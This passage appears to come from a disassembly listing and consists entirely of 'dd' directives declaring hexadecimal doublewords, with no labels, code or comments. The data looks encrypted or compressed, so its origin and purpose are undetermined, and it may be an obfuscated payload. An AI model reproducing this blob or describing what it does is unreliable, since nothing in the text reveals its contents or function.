		dd 0F9FFE68Fh, 1A112ACCh, 49426577h, 0F7BA92BDh, 50C8D1E1h
		dd 7A49180Ch, 96B35053h, 0CDFAEE9Bh, 150B38CBh,	514C630Fh
		dd 8C8296DAh, 3BC7D2C7h, 43031025h, 0A6B75E76h,	0C1F9B09Dh
		dd 2B272FDCh, 5E6F661Eh
		dd 0BBA9CC45h, 0C1C2D7DBh, 681B0820h, 0BF4A570Ah, 0E7ED89B1h
		dd 3433CFD9h, 56617F72h, 84A5B144h, 0DCDBEBE2h,	14052B32h
		dd 0B9404570h, 0E2E691A7h, 4828CFE7h, 64780109h, 9BA1AF32h
		dd 0B0F2F181h, 0D0A22EBh, 54536A68h, 0EB819091h, 3EC7FCEFh
		dd 87B0026h, 0A5A24A73h, 0CCEBF280h, 333231EDh,	4D50620Dh
		dd 8493B0B9h, 2CCFC8C1h, 7E2F742Fh, 0A6AC4976h,	0F0D9909Fh
		dd 780F32D7h, 55727A23h, 9C9BA250h, 0CED3F4D5h,	59020E07h
		dd 0A4487D0Ah, 0EDF09EA7h, 2133F6CEh, 54675A16h, 0B487D44Fh
		dd 0E1EECDB4h, 24587669h, 8A2E705Eh, 0FCA593AFh, 33BDFEDh
		dd 52161D1Fh, 8881BB57h, 0D5CDFA8Fh, 290609DBh,	4753561Ah
		dd 0EA8B8983h, 3CC7E2F3h, 705B0937h, 0A584247Bh, 0CCEBCF95h
		dd 52A35FCh, 69464907h,	16C592DAh, 0EF8BEF8h, 110CA0C1h
		dd 0D0ACD350h, 0D8031BACh, 0F34E6A8Dh, 665042AEh, 98019A72h
		dd 66237B82h, 9B6E4A69h, 127824CEh, 0C113ECCAh,	119E8F41h
		dd 380E1C1Ah, 0D48A59C2h, 0C2BEE6E1h, 3326155Fh, 14A53978h
		dd 0C0327F9Ah, 191EC6D6h, 95E93728h, 0F8F8E7DCh, 4F8A5069h
		dd 5E45BA37h, 28F2871Ah, 647B7111h, 63A682B0h, 5A1E068Bh
		dd 0F2D61452h, 0E94A17F2h, 20063EFBh, 0AB266633h, 8AA2CC1Ah
		dd 0CD51EC9Ch, 10504FA0h, 0FBFEE881h, 8F566128h, 0A2B99E2Bh
		dd 0F3C43732h, 1FF75h, 5F497B5Bh, 18CBF85Dh, 0B876340Ah
		dd 889E8332h, 403C7031h, 7864D0F9h, 0E0C6D442h,	0FABCE6E2h
		dd 901E4430h, 0B22E3C7Dh, 0C0B5A5CAh, 7380397Dh, 5949644Ch
		dd 0C3E049CDh, 4F0394DCh, 0E5F53DD6h, 20001166h, 0D63F031h
		dd 5090A48Ah, 5B49BD41h, 455DF6C5h, 0B8B8A738h,	57A7DB27h
		dd 3D60C62h, 6B093B25h,	6E955E17h, 3EE9F94Ah, 20DE2C2Ah
		dd 7F691BE0h, 4380D939h, 0BF8B145Ch, 0E8FEE417h, 5F498D72h
		dd 0CAEBF7ADh, 55260231h, 5BE9802h, 407EE635h, 0C6FAF472h
		dd 754D2BD5h, 0A888B738h, 6B0284DFh, 0F061B39Fh, 4F0EF4CAh
		dd 0C3A1537Ch, 55D53BBDh, 0F8CEDCDAh, 5D07C9EAh, 684857B2h
		dd 0A5BBCD29h, 98D8E246h, 1F7E0DBh, 0F74F3D12h,	0F6ED7EAFh
		dd 9C8A1BF2h, 4B68C155h, 0EA630C54h, 8A3C4DEh, 58AEBC92h
		dd 2F8BF517h, 0A2DE1A19h, 8A036905h, 284E6AA9h,	1426D938h
		dd 6BFEE622h, 67D0885Eh, 2E752CD7h, 1706F90Ah, 0BE85BE47h
		dd 6A5680BAh, 52CD4172h, 0F92E8C30h, 25BE8CE2h,	9EDC2518h
		dd 1BDE49DBh, 0ACAE61A3h, 0CC5BACB4h, 89546C72h, 0CEF294A7h
		dd 736463EAh, 687EA4F7h, 0A16B041Ah, 0AEF5653Fh, 1C3B3F8Ah
		dd 8B1E5A7Eh, 0C0DE0046h, 0B83718FDh, 9CC754AAh, 283E0E6Ah
		dd 0E1F2AC8Eh, 0CD51BC92h, 10504FC8h, 4C53D089h, 8097E0DEh
		dd 78240CB2h, 30061082h, 0BAAC9A22h, 3549D39Ah,	1858472Ch
		dd 47ABFD39h, 889EEDC6h, 423CF5EBh, 500F7623h, 0B0C6D42Ah
		dd 0E22B73B0h, 0F6767261h, 835ACA97h, 948EA09Ah, 1F5EAC83h
		dd 2032D085h, 7CEDC30h,	86BABE7Fh, 0A8FB15A2h, 34D5126Eh
		dd 0F23A7782h, 7F7E68Ah, 0CA8B9314h, 99D61201h,	68FB5C77h
		dd 5ED3ABFCh, 0A53E3A59h, 0B7A4808Dh, 0D5F6F8F8h, 106770DDh
		dd 8ED8702h, 73CFF490h,	281E0C19h, 6056443Ah, 0BA6B3370h
		dd 21B6B2A1h, 186C7496h, 0F452CB0Ah, 920B13CAh,	13569286h
		dd 414898Dh, 329BD41Ch,	963E8CE6h, 26773150h, 0CD56B199h
		dd 8905F4FCh, 585E390Fh, 0D115644Ch, 7C1C2364h,	0AF0E9B2Ah
		dd 677E4CA3h, 2037149Eh, 0A2D07CD2h, 0D0E0A4FFh, 8C116C7Ch
		dd 0C0D6253Bh, 0CDAEA272h, 4EC7125Bh, 6F704532h, 2F7D86AFh
		dd 17AFFA54h, 7A37BA61h, 9B887D02h, 0BC847105h,	43175C84h
		dd 0EF831BABh, 65FECC22h, 96A80C1Fh, 706E1652h,	0D0263406h
		dd 1D61BF92h, 406098A8h, 380E104Fh, 4F43DB2Ah, 41BE8CE2h
		dd 607644EBh, 8A7E0293h, 15E9A283h, 485EAC27h, 0AC1EA2F9h
		dd 7CC1D10Eh, 0B0869473h, 9B0B6C9Eh, 2F0C38B6h,	98EE7057h
		dd 70AB198Ah, 353E4C62h, 0B4B3431Bh, 8422E387h,	0F13A218Ah
		dd 401EF31Ch, 9183B0AEh, 28ADC213h, 65495B70h, 3799EA6Ah
		dd 3AA7EBFAh, 784E7BA2h, 0CF54F69Dh, 0DEC57EB7h, 0F076B79Ah
		dd 0F03E2C02h, 0D0263403h, 0E6E98386h, 2437CBD6h, 1A9BE372h
		dd 75C6E216h, 9B88F822h, 2CF3CD93h, 892E0A2Eh, 90E4F4A2h
		dd 1E0FFD02h, 26839B2Ah, 75CEEA0Eh, 869D077Fh, 0A14D1CA2h
		dd 7266554Eh, 0D11AD83h, 50908FD0h, 0F73A68C5h,	0F6ED0AAFh
		dd 384D64F2h, 46533F27h, 0EBC70D62h, 0E19CC5B0h, 2B518F6Dh
		dd 95738B4Eh, 0FB8458C2h, 33466F21h, 441E5FB9h,	2DB1A1E7h
		dd 5275CC14h, 0A0B68596h, 1966F6D9h, 2825340Ah,	3FE27E9h
		dd 21F05771h, 0DA491906h, 73E83FDFh, 23ED8325h,	0B4FD1396h
		dd 98446842h, 6F8CA69Bh, 73B0397Dh, 8D9D644Ch, 0F8F8E750h
		dd 9B8A5069h, 6F97CF6Dh, 205C03DDh, 0D767FC3Ah,	1FF57789h
		dd 49493804h, 8D8A6168h, 0D7FCFF9Bh, 4203BD9h, 46575B3Eh
		dd 9381ABBEh, 2ADBFFCEh, 64081138h, 0BBAC4954h,	0DCF88B93h
		dd 143E24F7h, 42636605h, 9A9F9822h, 0E8C2E1FDh,	181A0F3Dh
		dd 80263408h, 889EECC2h, 2435D6D3h, 5D67665Ch, 9CB6FA4Ch
		dd 0EBF7C2E2h, 7116411h, 0BB445977h, 0C5EC99A9h, 680CE9D1h
		dd 49592E0Fh, 8EE8FC7Ch, 0C5F2E683h, 689619A8h,	7D36041Ah
		dd 86741153h, 0D560B4BCh, 8287929h, 4643DB3Ah, 798EAAC9h
		dd 4C324B42h, 9DB51208h, 0E0C0FFE4h, 769210CBh,	91005E3Fh
		dd 0BDC3D33Ch, 0C22B69D9h, 0F34E6A8Eh, 9551161Ch, 6D736944h
		dd 0A080B32Dh, 2FB3F9DDh, 59DC343Ch, 0C6121684h, 41E75F44h
		dd 68E5D390h, 0F3DFCC2h, 8CC20F1Dh, 24034052h, 0D82E34FAh
		dd 0D3A0A7CAh, 412E8ACh, 92839B7Ah, 0F3CEEA09h,	238BE02Ah
		dd 972D4EC8h, 160D3E8Fh, 0B3E03D2h, 0AF582A62h,	81584BDh
		dd 8685243Ah, 0EBC1C3B1h, 3C0A1084h, 0BAABF362h, 8F6F2E1h
		dd 0A7514211h, 0EF907DA2h, 1A53D3FDh, 0B396D2E8h, 94CBD17Bh
		dd 61062255h, 0B8AF9D73h, 5FE7D5CBh, 2E55F2C7h,	0D02DDC0Ah
		dd 0DBCBECC2h, 7265F6FFh, 7442585Ch, 62532B2Ah,	40BEBAD9h
		dd 60764450h, 0AA5E4F65h, 0F6929AA3h, 0B70EACC3h, 362D5EEFh
		dd 0BA4B5532h, 0BF86A2D1h, 19F3C193h, 0A9363203h, 0AED2B457h
		dd 0C559E58Ah, 82857D0h, 0C0D24CA9h, 0D039CF2h,	70704DD4h
		dd 683813Bh, 8F6F2E6h, 0A751495Bh, 71E3B32Ch, 0C8DE1A1Ch
		dd 0E33367AAh, 784E6AACh, 2E2781E7h, 0BCAECC14h, 0A0DC85F0h
		dd 186C1400h, 45D9B40Ah, 88A8D0F0h, 350C643Fh, 6C839150h
		dd 0A2C6E234h, 1D338A88h, 60405A3Bh, 887E6A46h,	519A69Bh
		dd 486890B4h, 2E839B22h, 3ECEEA0Eh, 86B8DB6Fh, 64964CA2h
		dd 7736041Ah, 0D3ADB381h, 148886B9h, 0F71E200Eh, 0F6EDB6AFh
		dd 0BFE60FF2h, 0FD4654AAh, 1E26D9D7h, 5D7B9DDAh, 5898876Ch
		dd 0EF9330A2h, 0C8D2C4FDh, 0C9C1E4FAh, 3D0015FCh, 7C423A3Eh
		dd 7D01CC6Eh, 0A080BF08h, 9C61BCD7h, 0D026363Fh, 889B8451h
		dd 0F5DBA4BAh, 38380561h, 0EA7B5973h, 40BEBADEh, 9F89B157h
		dd 0E4308191h, 9FE6F4FCh, 485CBC06h, 90FAE57Ah,	0ACCEDC33h
		dd 0B0879582h, 96EBB3A2h, 0A1363221h, 98EF6C16h, 842DE48Ah
		dd 0F74C6C28h, 0F6EA3AAFh, 0E14E19F2h, 0F82E59DFh, 0D73E0C71h
		dd 0D6CD764Fh, 0DB4C5792h, 267817F7h, 0E1AB2C02h, 9EF16177h
		dd 871E5C84h, 63A1EFFh
		dd 0E73E4922h, 0A0B70D1Eh, 142EF752h, 0E0D93481h, 96FD694Dh
		dd 0C590A48Ch, 3838223Dh, 9AC6BE2Bh, 57BCE6E3h,	564A52CFh
		dd 27D6BF12h, 918670C5h, 0C5CDAC82h, 36083BEFh,	0AADEB632h
		dd 0B6136BB9h, 0ED7E7A9Eh, 60B30BDAh, 15EEFCD3h, 66B8CD37h
		dd 0E016DD42h, 3F29DE79h, 0B88E089Ah, 966D0AAAh, 7C1A38EBh
		dd 0DB7C5125h, 0E523BCA4h, 10506ACDh, 0EC362DB3h, 0D691B00h
		dd 4E502827h, 58067E6Ah, 0E8FECC36h, 3549D7C8h,	18584040h
		dd 0C4027087h, 0B772794Fh, 4F06A48Ch, 7C8516C4h, 1007C00Eh
		dd 0A9F48EEAh, 72740E48h, 9C253F58h, 7166FCEEh,	40BE6D8Dh
		dd 24526F2Bh, 0A8FC2322h, 8CD62967h, 74964C94h,	536041Ah
		dd 0B896CAFCh, 708894A4h, 2D3B4978h, 0E5AE1C14h, 0CBABBC8Ah
		dd 39091EA0h, 7F3E2C2Ch, 0DBB45125h, 9C2FBCA4h,	106674E6h
		dd 9F8E2C68h, 92031BA9h, 0F34E6A8Eh, 61390E7h, 0BFEA622h
		dd 0AD7FEF81h, 186B9403h, 0F500340Ah, 0DF9EE6A6h, 7B143145h
		dd 0FC8D1C44h, 0FB2D8426h, 0A8BE8B8Ah, 0EDCBC95Ah, 8F2E0A0Ch
		dd 82730B99h, 0CD5E9ABEh, 8D421ABAh, 0CEF28C87h, 342317EAh
		dd 687E7AB7h, 1E798997h, 56C5FCE4h, 6F7B4E0h, 68B9311h
		dd 43D61206h, 97F09C0Ah, 0FDB8DF3Bh, 1E025CD7h,	12FB74DAh
		dd 38BEC93Ch, 0EF9C45A2h, 0DFAC4DFDh, 0F71BED19h, 0F3A4B7B3h
		dd 0BDC83FA5h, 0DEC29C9Fh, 2712779Ah, 4BD797A5h, 0EC24A1F5h
		dd 351EECF4h, 4060B1D1h, 50246873h, 0F0C6A11Ah,	930C191Dh
		dd 0DDF6446Ch, 0D818025Dh, 57F780CAh, 7E40CF07h, 16647Ah
		dd 0B74B1A32h, 0B086A2D4h, 9780444Bh, 54B3C3E5h, 98EECAC7h
		dd 0D26B48Ah, 51E6880h,	0AEF66B30h, 98E0F39Dh, 1C6632C5h
		dd 95B6A0Bh, 94D68BFAh,	78CBD1FBh, 73461B3Eh, 0AABB4067h
		dd 0E5E28588h, 58445193h, 1026344Ah, 9D8DEC6Dh,	0D2D3E9F7h
		dd 6A0F1B72h, 0F148516Eh, 0EDCCE6CFh, 3438C1D6h, 4B7D791Eh
		dd 98E6AD46h, 0D1CEFC83h, 418257Ah, 0A8565932h,	0F19297AFh
		dd 6872D8ECh, 6E771009h, 9FA0B556h, 0BDABB4D0h,	1C1F1BA8h
		dd 4E5F6C79h, 0F48FDCB5h, 31C294E6h, 667F4C3Bh,	0A9B8045Eh
		dd 94FAF495h, 229328Ah,	414C6A42h, 9392AABFh, 2F8EF5B2h
		dd 2A121D2Bh, 0A089260Fh, 0A0F3969Fh, 582B2ED3h, 1C737B13h
		dd 818CAA02h, 0D3D2EAFFh, 772D5C6Dh, 0F0075167h, 0E1BE988Bh
		dd 292284C9h, 182F791Fh, 83E1A063h, 0DCDFE0C2h,	0E472653Fh
		dd 0CC070CD5h, 0C2AEE46Ch, 494AECB5h, 0B2FED93Ah, 51E5F60h
		dd 0E9D1DED1h, 0E3E77609h, 0DDA4DF9Fh, 77DE25B6h, 3E83D4E4h
		dd 0D56FCD77h, 0C0D6FF53h, 0B88E9CF2h, 704654AAh, 283E0C62h
		dd 0E0F6C4DAh, 58AEBC92h, 1066744Ah, 0C8DE2C02h, 8096E4FAh
		dd 784E5CB2h, 3006146Ah, 0E8FECC22h, 0A0B6849Ah, 186E7C52h
		dd 0D026340Ah, 889EECC2h, 4056A4BAh, 380E1C72h,	0F0C6D42Ah
		dd 0A8BE8CE2h, 0E316445Ah, 0EE1180B7h, 3565F4CAh, 48689342h
		dd 43A16B7Ah, 0E09D5126h, 0B6CD23E5h, 2CF59CA1h, 621D203Eh
		dd 0A3F78EDEh, 44D5BCC8h, 230A2EC9h, 555F2878h,	0B8B8A34Eh
		dd 4F86D123h, 2DD50C54h, 2DE0659h, 5C6CDD4Bh, 5CE3FC4Ah
		dd 20DE1A26h, 8096E49Eh, 784E7CDAh, 4983996Ah, 0B1FEFA01h
		dd 0ACC29CA3h, 0FA6ABCD1h, 4CA3CBFDh, 4B9EDAFDh, 0CD557D4Dh
		dd 3838383Eh, 8039C4C9h, 2BBE031Eh, 969440B2h, 0FB57A19Bh
		dd 0AA65F4FCh, 635BD882h, 10646748h, 0A03292BFh, 8A05CAB1h
		dd 977A38A2h, 0DF35EF28h, 0CF06ECA0h, 7B594B75h, 0C893478Ch
		dd 98D61205h, 7BBAD7F1h, 4FE6D125h, 0ADF90C54h,	0E0C0FB46h
		dd 58AEBC92h, 106648A2h, 545BA702h, 6896D2C5h, 87B1AA02h
		dd 30060C82h, 74434F22h, 0A0B6B2A5h, 85E77427h,	0D01017FFh
		dd 5617029h, 40609B26h,	988B93B1h, 79C6E215h, 9E811077h
		dd 6075AC5Ah, 111D3C12h, 10757F09h, 1A5EAC82h, 0FFE88992h
		dd 385BDFCDh, 0B386A2D5h, 6404CF74h, 27B20B1Ah,	1BEEFCD3h
		dd 5FA6A4F0h, 81E91C6h,	0CC94AF3Ah, 464674A2h, 0F545AB55h
		dd 280833A2h, 6AA602D9h, 58573C9Ah, 0E9E66D3Eh,	88DD582Ch
		dd 0C81D1511h, 0A7AFDDB3h, 0B1D9CBB5h, 0A4B288DBh, 0F95AF19Ah
		dd 0E1EDB479h, 67A93BF0h, 0EE9EECC2h, 73A8DC3Bh, 938B1340h
		dd 0A6C6D42Ah, 0DDBEB661h, 703CCF5Fh, 0D2A53EF9h, 78B705C9h
		dd 0B7A152F0h, 3FD6D179h, 7D63DC04h, 0BF7DEC2Ah, 687EC826h
		dd 0E083FB1Ah, 0C8EECAEDh, 0AF58E162h, 0C89B6FBDh, 4FD61205h
		dd 8EB15C77h, 544257AAh, 2AFE8F31h, 56F91FE9h, 0D8BC5F9Ah
		dd 0D1355483h, 0E1DA0826h, 8CBFC0E6h, 930E0796h, 3FFD9583h
		dd 9C2377F5h, 84D05A4h,	6CB51217h, 89DDB53Ch, 0FC614DF9h
		dd 96AD2594h, 4CA2A950h, 633D550Ch, 0DC4DD40Bh,	1D8DC544h
		dd 0ACDD64FBh, 0D61D75DCh, 3CBF89BDh, 30EDE574h, 8C2FF90Dh
		dd 10136BECh, 337E7A9Dh, 0DFC975F3h, 5A6DA22Dh,	0AE495D9Eh
		dd 0BDD93BDh, 288E2050h, 477169A2h, 5660C122h, 90580C54h
		dd 2F4DCEBh, 5AAD5852h,	7ACD12A8h, 0FD367404h, 3691B0Fh
		dd 0A9C95470h, 0D85E1100h, 1701390Ah, 0D3B57E1Ah, 1A3ECC59h
		dd 0E600128Fh, 0AF7546C2h, 0EA0ECCD0h, 4D0DE6F2h, 18D76432h
		dd 574179EAh, 607645E2h, 0ACFCB812h, 6E0625C7h,	0A3A84748h
		dd 16DC7Fh, 1A655C32h, 250B5755h, 6848743Ah, 0FAC1D331h
		dd 136B0B11h, 50A682B2h, 7166C42h, 2017E4AFh, 310B6AF9h
		dd 71466292h, 25580A17h, 0F31DE153h, 60273964h,	6564747Ch
		dd 0F9D34A04h, 0E6920FDFh, 1E6B5DBFh, 0CFBAFCC1h, 0AB7533DDh
		dd 14230DAEh, 0B36E4A6Dh, 5BA3C3C9h, 889EDAFAh,	4F5EA4BAh
		dd 840ADCE7h, 0F5A3C80h, 3D37731Dh, 60407BE2h, 0E0A7B9E4h
		dd 0E5E7F4FCh, 0A36FA386h, 0ABD64F78h, 734B2BF1h, 0B086A2D2h
		dd 1C764CA2h, 0A5B38E3Dh, 59EECAEAh, 5DC0BF6Ah,	0A37829C9h
		dd 4A7CDC8Ah, 8EB61977h, 6BA695AAh, 0A15A6B67h,	20C56FDCh
		dd 4A4517F4h, 15E910F2h, 4D548702h, 80A0DC7Fh, 988F04B6h
		dd 80C5BF72h, 8EDE27DEh, 0C6B66F22h, 727797F9h,	0C9CE6C0Eh
		dd 5611336h, 0A09776BEh, 0B10B7A7Ah, 1B6DB2EAh,	22E3CE1h
		dd 882E4630h, 27D1C812h, 0A292264Eh, 0A006A4E8h, 0FFE9978Eh
		dd 3BBC16CCh, 7A78519Eh, 0A28085D6h, 0EAC8DF6Eh, 5210F0A6h
		dd 9A58B8FEh, 0F1AE6036h, 3D66E9D1h, 4D3E5519h,	88F69141h
		dd 0A5FDCD89h, 0D6CE5C67h, 0D32B4B92h, 10664272h, 0BC5E2C02h
		dd 2AF654F9h, 40C5D945h, 3006145Ch, 0EF8AC422h,	4C3DD122h
		dd 0EF21D752h, 0E61EBF8Fh, 889EEFC2h, 97D2ABBBh, 880E1C72h
		dd 796D7EC2h, 9E81285Fh, 0CA9EF45Ah, 7093B5B9h,	67E6C2F5h
		dd 7E662707h, 16677Ah, 0FDBA832h, 86BE1F6Fh, 687E4CA2h
		dd 0C833701Bh, 67110213h, 0FB0C5D3Ah, 37BAE9C9h, 0F5D240Ch
		dd 50754D9h, 70706B06h,	90C244EBh, 0D609A0BDh, 3E6E8F39h
		dd 9BE383E1h, 0CBDE1A3Ah, 0F496E4FAh, 0F1CBAABCh, 0B0062252h
		dd 0AA16C956h, 18497B64h, 3EE71835h, 0B6E607A1h, 31B1B69h
		dd 43569282h, 4C0E1C72h, 7943227Fh, 28BEBADAh, 7E9E412Fh
		dd 30D1C3ECh, 6F19096Eh, 0FEB68C32h, 0E3E99B81h, 776BA0Bh
		dd 212DF2FFh, 0E3EBC709h, 0D7363222h, 9B2C0B00h, 25A6B48Ah
		dd 0F5608456h, 0DF66DBC5h, 47750C1Ah, 8FFE3255h, 0B9956A77h
		dd 6B394F71h, 6E911017h, 99AE5F4Ah, 4D29D04Ah, 80A0DC71h
		dd 784E5CB1h, 0B5F13A1Eh
		dd 0E8C8F4A9h, 0A6B6849Ah, 9D995E26h, 0D0100C81h, 899EECC2h
		dd 0B2BEA1CFh, 0CFF1E38Fh, 0C6FE5FAFh, 0A8BE8CE2h, 8873305Eh
		dd 27D1C21Fh, 0A86D713Dh, 485AACB4h, 1762647Ah,	730BBDAh
		dd 70AF2C15h, 0D0D5845Ch, 2442C412h, 609B4479h,	0A70DD361h
		dd 3E26E7C7h, 0C0D62C3Ah, 38C1E9F2h, 467EDD17h,	6E4A0C62h
		dd 1F08FF32h, 4087046Dh, 0B56CBD63h, 0C8E81487h, 8A95003Ah
		dd 4E76D917h, 81B6BF6Ah, 617B4688h, 0AB6B2A2h, 9D643CE2h
		dd 0D0100C8Fh, 6A268A68h, 0CBD35347h, 280E2A4Ah, 84C6D42Ah
		dd 2F73CE5h, 9C03FC3Ch,	309E9774h, 3B26C760h, 77CE110Bh
		dd 85E1644Ch, 0F8F8E4B9h, 0B08694CAh, 30CE45D7h, 18B58110h
		dd 0FE44FCE4h, 0A7663532h, 3E26E7C7h, 0C0D6643Ah, 388DE8F2h
		dd 0D54C7C6Eh, 280834E1h, 5D7F6FBCh, 58988306h,	9BE383E1h
		dd 0C8DE1A3Ah, 0F5D6E4FAh, 7A1EECBBh, 63E97EFh,	6D096622h
		dd 0A080BC11h, 186E7CD2h, 68963F7Fh, 0B01A69C8h, 0ABFCA48Ch
		dd 9B67A4Fh, 7B432332h,	0A8BEBADAh, 1476445Bh, 0D2078C10h
		dd 0A6DE706Fh, 4BBA6C82h, 3892C170h, 53A8DC04h,	40072C8Ch
		dd 50F5C955h, 2236042Ch, 9A9BFCD2h, 0F5AC7C3Eh,	82854C6h
		dd 7D5F8F5Ch, 0B8B8A342h, 706ECC12h, 0ADC9A762h, 0E0C0FC51h
		dd 58AEBC9Ah, 218E053Eh, 3F21D3FFh, 0B6AE6F7Fh,	784A5CB2h
		dd 800D616Ah, 6D7BC69Ah, 0AB6B2A2h, 9D9931B9h, 0D0100C81h
		dd 889EE4C2h, 0F830B5CFh, 9D04FCF1h, 0F0F0ECAFh, 688D2784h
		dd 663AFF0h, 0D23615AAh, 0A6DE716Fh, 4BBA6C82h,	3893C170h
		dd 53A8DC04h, 880D111Dh, 787E4C94h, 9850041Ah, 9B9A3C53h
		dd 5AAE700Ah, 3E26E9E7h, 0CF7D423Ah, 80071944h,	98ED549Ch
		dd 0D7C1F0A2h, 0D87D412Dh, 58AEBCA4h, 1912344Ah, 4DDC7CB2h
		dd 80A0DC79h, 0F3CBAB18h, 30062252h, 58FECC02h,	0A4B4F11Ch
		dd 0E621F156h, 0E8A59180h, 517ECF4h, 40609B22h,	0C48EB714h
		dd 40C1A12Fh, 57F10CE2h, 199EEE1Ah, 2FD1C3EEh, 0A6DE7F4Fh
		dd 481EAC82h, 66AE027Ah, 4CCCA903h, 2DF2C3h, 0EDFB46BAh
		dd 0E0363222h, 7044FF32h, 0AF5948DEh, 8DE9E4F2h, 0C0E01CB1h
		dd 0B88E1CF2h, 0F6F656DFh, 10BDA9E8h, 4B90C4ECh, 2DAB4012h
		dd 9066C44Dh, 629ED34Dh, 7F6ACF12h, 0F3CBAB4Dh,	30062252h
		dd 9DFECD22h, 0AAF63491h, 2E56FFD7h, 0DFCD9E0Ah, 481D54A4h
		dd 78D501B0h, 93681C44h, 76CD59Ah, 9E860767h, 6276445Ah
		dd 2F014912h, 0A6DE7F4Fh, 4C5EAC82h, 0B00C117Ah, 7D4BD6F2h
		dd 3A86A2D2h, 5E46C607h, 30D6C51Ah, 198844B4h, 0BBA60421h
		dd 25EDC4Ah, 0F6EEA1BFh, 3D7936F2h, 70706C21h, 28360C62h
		dd 5890D4AFh, 0FDA45411h, 10504CCEh, 0C96E8764h, 0C826EC11h
		dd 40CAD9B8h, 0C7AC145Ch, 0DEC647A7h, 0B0B6849Ah, 6D1BCD52h
		dd 539E522Fh, 0C3BE63Ah, 26569282h, 92CE2FD9h, 0CF5E6903h
		dd 2D498CD4h, 60407CD1h, 0D80E3C12h, 0E757EBBFh, 0F038B769h
		dd 0A51C7C73h, 0F8F8E4B6h, 0BA85702Ah, 5E46C807h, 99D621Ah
		dd 0AED1646Fh, 0DA673E8Ah, 3E21F4E7h, 707D423Ah, 3B0B9EAAh
		dd 0DA466292h, 10B58995h, 0E0F5C4ECh, 7ADABD92h, 28EDF1BDh
		dd 0C8DE2C34h, 96E3E0FAh, 40C5D945h, 3006145Ch,	0ED8BCF22h
		dd 5F4C0072h, 0E2C594ADh, 55D1CBF5h, 88A8D449h,	4856A4BAh
		dd 0F1BE1F06h, 7B432380h, 0A8BEBADAh, 14F6445Ah, 0F2298C32h
		dd 0A6DE774Fh, 52BE6D82h, 241EED77h, 7B6BDE32h,	7086A2D2h
		dd 0ACFE4F46h, 4186AF1Eh, 67569A78h, 0D303BE6Ah, 6E1E5A7Ah
		dd 4B53D391h, 988EAACAh, 44654AAh, 0A3BBFB31h, 0E0F6F2E2h
		dd 2C8EBC92h, 13A18347h, 0BCDE2C02h, 2A0654FFh,	0BFC5AF59h
		dd 0F9699E1h, 29D5CC14h, 104AC513h, 9BEB760Ah, 7A260232h
		dd 0B0156935h, 4056A48Ch, 347A1C32h, 33966C4Ch,	903D09E8h
		dd 6A9D446Ch, 38D18474h, 0A86551C0h, 0E338ACB4h, 389DE18Dh
		dd 0F8CDDC04h, 0C3F295EAh, 50F5C955h, 2036042Ch, 959ADCD2h
		dd 50A5737Dh, 0D6A6C42h, 2B7CB48Ah, 33411701h, 4679FC2Fh
		dd 0A1F62762h, 29C53892h, 60253965h, 1066747Ch,	0C6AB2C82h
		dd 0B8156177h, 70C45C84h, 33FF942Ah, 0EC733451h, 0B092C057h
		dd 108EBD52h, 338DBFBAh, 0B9268AC4h, 26FDC27Ah,	508E93CAh
		dd 0F0C6D492h, 3D86DE0h, 0A9F3EF02h, 60483A67h,	3B8034FBh
		dd 0C5F46F32h, 362EFCFFh, 734B2B32h, 0B086A2D2h, 1D6E4CA2h
		dd 0D81D531Ch, 13F7178Ah, 0A88D9CD9h, 8595BC69h, 0C0E01B8Ah
		dd 871E09F3h, 4947549Ch, 2C1A48E9h, 0F09E7953h,	0E525BCA4h
		dd 10504BDEh, 0F74EA929h, 561E4CCh, 78786439h, 3006142Ah
		dd 3009CE56h, 0A0B24631h, 0A5ED2B04h, 0D0100BC2h, 511AE3C2h
		dd 0A856A4BBh, 380E1C7Fh, 0BE949161h, 9A8DC0A7h, 2C3A0074h
		dd 0A2BBC312h, 19E6C2F1h, 7E617007h, 589D377Ah,	716DF0Eh
		dd 0F30DBC99h, 9D9EA496h, 0B5BDFBE5h, 98D8C36Eh, 5CE4B7D1h
		dd 37FEE9CBh, 82D5240Ch, 5C0B15FAh, 0FB466295h,	9BC12411h
		dd 0E0F6C45Ah, 0A75B057Ah, 0ACDBFFB5h, 9EDE1A3Dh, 7F634912h
		dd 0C4DBD74Dh, 0BB062255h, 0A2FDC468h, 2378AF96h, 906179BBh
		dd 0D026356Ah, 89C468CDh, 0F555A4BAh, 383823B2h, 0CF466129h
		dd 94128CD4h, 0C2F34BB2h, 552E3C12h, 15CDF08Ch,	48689302h
		dd 0E8466279h, 7312958h, 8F3A2969h, 1D7E4C94h, 2C713F11h
		dd 99F57FDDh, 5C4DB48Ah, 37A2F97Bh, 45D9240Ch, 0B88E9DFFh
		dd 4FC6D1A9h, 0A9580C54h, 0EFD33BE2h, 58AE4017h, 1226FF4Ah
		dd 98EA6F29h, 7F63C912h, 0C4F3654Dh, 3F062255h,	0E8FE28A7h
		dd 6033879Ah, 1B6E4A6Dh, 0E619B48Fh, 0A39E67C2h, 0C259A8FDh
		dd 380E1CBFh, 0FFCE9311h, 0A8BE4861h, 62B6C75Ah, 0DB3A7B11h
		dd 0A6D9744Fh, 0B70EFE82h, 3629B8CFh, 0C25B2332h, 0EA86A2D1h
		dd 0ED718C27h, 203604ADh, 98EE603Bh, 5F59888Ah,	81EF8C7h
		dd 0D5E8A43Ah, 0B80519FDh, 36CD54AAh, 1C7D2763h, 144A2C8Ah
		dd 0E597436Dh, 10504BF6h, 4DDD5B77h, 80A0DB3Ah,	47CED9B1h
		dd 0B58F145Ch, 0E8C8F3CAh, 258D8411h, 185843B2h, 551D3C78h
		dd 88A8D326h, 406BCDC8h, 4A7E1C72h, 0F0D93C1Dh,	0E6338CE2h
		dd 4BB7CFA6h, 0C86C3F10h, 0AF0E71F1h, 442BACB4h, 0FF06A0F9h
		dd 0DC8A5303h, 0AB6DF5F6h, 0C8FBC361h, 40363225h, 0A76E4959h
		dd 0A4EB4BCh, 69E193B7h, 0C0D62493h, 9380E972h,	793458EDh
		dd 27364B59h, 1F09F858h, 0DDA1F56Dh, 0EF998AF8h, 49FA1089h
		dd 80BE6F5Dh, 87B1A3B2h, 0B144FF15h, 0E89EE868h, 93F8649Ah
		dd 3C62F792h, 0EFEEB18Dh, 0D17ECF4h, 40609B7Eh,	1081A5FFh
		dd 75C5D42Ah, 0A888B362h, 2ED3E13Ch, 9A2DFA39h,	9CA4DFDEh
		dd 0A0A5EA44h, 45E5BDh,	0F8CBDC32h, 0F60F94EAh,	0AB20135Eh
		dd 0A6A3FB4Dh, 59EECAE9h, 0D5A9AB62h, 81E6D58h,	0E8BC706Ah
